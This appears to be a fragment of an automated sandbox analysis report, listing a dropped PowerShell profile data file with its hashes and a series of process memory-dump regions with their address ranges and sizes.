C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d61d7f65117823a52913b840feed43c6
SHA1e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f
SHA256d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86
SHA512e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c
-
memory/436-8040-0x000001CD9AF00000-0x000001CD9AF2A000-memory.dmpFilesize
168KB
-
memory/436-8041-0x00007FFC93BC0000-0x00007FFC93D9B000-memory.dmpFilesize
1.9MB
-
memory/436-8042-0x00007FFC91130000-0x00007FFC911DE000-memory.dmpFilesize
696KB
-
memory/436-8008-0x000001CD9ACE0000-0x000001CD9AD02000-memory.dmpFilesize
136KB
-
memory/436-8011-0x000001CD9AF40000-0x000001CD9AFB6000-memory.dmpFilesize
472KB
-
memory/584-8075-0x0000026C89950000-0x0000026C8997B000-memory.dmpFilesize
172KB
-
memory/584-8068-0x0000026C89950000-0x0000026C8997B000-memory.dmpFilesize
172KB
-
memory/584-8076-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmpFilesize
64KB
-
memory/584-8069-0x0000026C89950000-0x0000026C8997B000-memory.dmpFilesize
172KB
-
memory/584-8067-0x0000026C89920000-0x0000026C89945000-memory.dmpFilesize
148KB
-
memory/640-8080-0x0000012A25690000-0x0000012A256BB000-memory.dmpFilesize
172KB
-
memory/640-8086-0x0000012A25690000-0x0000012A256BB000-memory.dmpFilesize
172KB
-
memory/640-8087-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmpFilesize
64KB
-
memory/740-8098-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmpFilesize
64KB
-
memory/740-8097-0x0000010EC5570000-0x0000010EC559B000-memory.dmpFilesize
172KB
-
memory/740-8091-0x0000010EC5570000-0x0000010EC559B000-memory.dmpFilesize
172KB
-
memory/900-8102-0x0000022515BE0000-0x0000022515C0B000-memory.dmpFilesize
172KB
-
memory/900-8108-0x0000022515BE0000-0x0000022515C0B000-memory.dmpFilesize
172KB
-
memory/900-8109-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmpFilesize
64KB
-
memory/1008-8113-0x00000268314A0000-0x00000268314CB000-memory.dmpFilesize
172KB
-
memory/1600-7992-0x0000000005BD0000-0x0000000005C0E000-memory.dmpFilesize
248KB
-
memory/1600-7988-0x0000000004B90000-0x0000000004C22000-memory.dmpFilesize
584KB
-
memory/1600-7985-0x0000000073B4E000-0x0000000073B4F000-memory.dmpFilesize
4KB
-
memory/1600-7986-0x00000000002B0000-0x000000000031C000-memory.dmpFilesize
432KB
-
memory/1600-7987-0x0000000004FE0000-0x00000000054DE000-memory.dmpFilesize
5.0MB
-
memory/1600-7989-0x0000000073B40000-0x000000007422E000-memory.dmpFilesize
6.9MB
-
memory/1600-7990-0x0000000004C30000-0x0000000004C96000-memory.dmpFilesize
408KB
-
memory/1600-7991-0x00000000057E0000-0x00000000057F2000-memory.dmpFilesize
72KB
-
memory/1600-8003-0x0000000073B40000-0x000000007422E000-memory.dmpFilesize
6.9MB
-
memory/3008-8025-0x0000000006420000-0x000000000642A000-memory.dmpFilesize
40KB
-
memory/4328-8054-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-8053-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-8052-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-8058-0x00007FFC91130000-0x00007FFC911DE000-memory.dmpFilesize
696KB
-
memory/4328-8064-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-8056-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-8057-0x00007FFC93BC0000-0x00007FFC93D9B000-memory.dmpFilesize
1.9MB
-
memory/4328-8051-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB